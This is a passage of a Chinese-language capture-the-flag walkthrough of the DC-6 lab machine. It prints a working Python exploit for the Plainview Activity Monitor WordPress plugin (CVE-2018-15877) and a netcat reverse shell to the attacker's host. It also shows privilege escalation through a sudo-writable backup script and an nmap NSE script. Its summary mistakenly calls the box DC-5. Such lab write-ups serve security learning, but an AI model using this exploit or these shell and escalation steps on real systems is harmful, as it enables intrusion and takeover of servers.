WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) | https://www.exploit-db.com/exploits/50110
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
Papers: No Results
发现4个可以利用的漏洞脚本。
┌──(root?kali)-[/home/kali]
└─# searchsploit -x php/webapps/50110.py
Exploit: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
URL: https://www.exploit-db.com/exploits/50110
Path: /usr/share/exploitdb/exploits/php/webapps/50110.py
Codes: CVE-2018-15877
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
3.4.4 查看poc文件
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cp /usr/share/exploitdb/exploits/php/webapps/50110.py poc.py
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat poc.py
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877
"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28 whoami
www-data
www-data@192.168.101.28 pwd
/var/www/html/wp-admin
www-data@192.168.101.28 id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""
import requests
from bs4 import BeautifulSoup
def exploit(whoami, ip):
while 1:
cmd = input(whoami+"@"+ip+" ")
url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
payload = "google.com.tr | " + cmd
data = {'ip': payload , 'lookup' : 'lookup' }
x = requests.post(url, data = data, cookies=getCookie(ip))
html_doc = x.text.split("<p>Output from dig: </p>")[1]
soup = BeautifulSoup(html_doc, 'html.parser')
print(soup.p.text)
def poc(ip):
url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
x = requests.post(url, data = myobj, cookies=getCookie(ip))
html_doc = x.text.split("<p>Output from dig: </p>")[1]
soup = BeautifulSoup(html_doc, 'html.parser')
print("[*] Perfect! ")
exploit(soup.p.text, ip)
def getCookie(ip):
url = 'http://' + ip + '/wp-login.php'
#log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
x = requests.post(url, data = data)
cookies = {}
cookie = str(x.headers["Set-Cookie"])
for i in cookie.split():
if(i.find("wordpress") != -1 and i.find("=") != -1):
cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
return cookies
ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)
该poc文件中已经说明使用方法
3.4.5 运行poc文件
┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# python poc.py
What's your target IP?
192.168.6.157
What's your username?
mark
What's your password?
helpdesk01
[*] Please wait...
[*] Perfect!
www-data@192.168.6.157
3.4.6 反弹shell
3.4.6.1 kali监听6666端口
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666
listening on [any] 6666 ...
3.4.6.2 反弹shell
运行poc.py后的终端:
www-data@192.168.6.157 nc -e /bin/sh 192.168.6.66 6666
3.4.6.3 调用标准终端
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666
listening on [any] 6666 ...
connect to [192.168.6.66] from wordy [192.168.6.157] 56862
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-6:/var/www/html/wp-admin$
调用标准终端成功。
3.4.7 尝试suid提权
寻找有SUID权限(4000)的文件,不显示其他的错误信息:
www-data@dc-6:/var/www/html/wp-admin$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
www-data@dc-6:/var/www/html/wp-admin$
无果。
3.4.8 更多系统信息
在/home/mark/stuff文件发现graham账号的用户信息。
www-data@dc-6:/var/www/html/wp-admin$ cd /home
cd /home
www-data@dc-6:/home$ ls
ls
graham jens mark sarah
www-data@dc-6:/home$ cd mark
cd mark
www-data@dc-6:/home/mark$ ls
ls
stuff
www-data@dc-6:/home/mark$ cd stuff
cd stuff
www-data@dc-6:/home/mark/stuff$ ls
ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat th*
cat th*
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
获得账号信息:
| 序号 | 用户名 | 密码 |
|---|---|---|
| 1 | graham | GSo7isUM1D4 |
3.5 graham用户相关
3.5.1 切换graham用户
www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
graham@dc-6:/home/mark/stuff$
登录graham用户成功
3.5.2 再次尝试sudo提权
graham@dc-6:/home/mark/stuff$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
发现/home/jens/backups.sh
3.5.3 bash写入backups.sh
graham@dc-6:/home/jens$ echo "/bin/bash" >> backups.sh
echo "/bin/bash" >> backups.sh
graham@dc-6:/home/jens$
3.6 jens用户相关
3.6.1 切换jens用户
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
sudo -u jens ./backups.sh
tar: Removing leading `/' from member names
jens@dc-6:~$
切换jens用户成功。
3.6.2 查看suid可执行的命令
jens@dc-6:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
jens@dc-6:~$
3.6.3 查看sudo可执行的命令
sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
发现可执行的sudo命令:/usr/bin/nmap
3.7 nmap提权
3.7.1 创建shell.nse文件
jens@dc-6:~$ echo 'os.execute("/bin/bash")' > shell.nse
echo 'os.execute("/bin/bash")' > shell.nse
jens@dc-6:~$ ls
ls
backups.sh backups.tar.gz shell.nse
jens@dc-6:~$
3.7.2 执行shell.nse文件
jens@dc-6:~$ sudo -u root nmap --script=shell.nse
sudo -u root nmap --script=shell.nse
Starting Nmap 7.40 ( https://nmap.org ) at 2024-05-29 22:52 AEST
root@dc-6:/home/jens#
千难万难终于取得root权限,O(∩_∩)O哈哈~
3.7.3 查看flag
root@dc-6:/home/jens# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
root@dc-6:/home/jens# cat /root/theflag.txt
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
渗透总结
在DC-5靶场渗透测试中,使用了nmap、whatweb等工具进行渗透测试,使用nmap进行主机发现和端口扫描测试,使用dirb扫描目录,使用whatweb信息网页信息搜集取到了关键信息,wpscan爆破用户名和密码,最后进行了linux系统提权,并获得所有的flag,思路如下:
- 使用nmap进行主机发现和端口扫描
- 使用dir目录扫描
- 漏洞搜索
- 获得poc,并运行poc文件
- 反弹shell
- 进行3个用户(mark,graham,jens)系统信息探索
- nmap获得root权限
- linux内核提权,并获得flag
参考文章
- DC-6环境
- arp-scan使用
- nmap详细使用教程
- 黑客工具之whatweb详细使用教程
- xhydra的使用
- WPScan使用完整攻略
- web网站目录爆破工具Dirb使用指南
- dirsearch使用教程
- dc-6渗透测试流程图
![[ue5]建模场景学习笔记(2)——用vectornoise降低重复率](https://img-blog.csdnimg.cn/direct/b08ade56565b4101be6ad266587059a0.png)
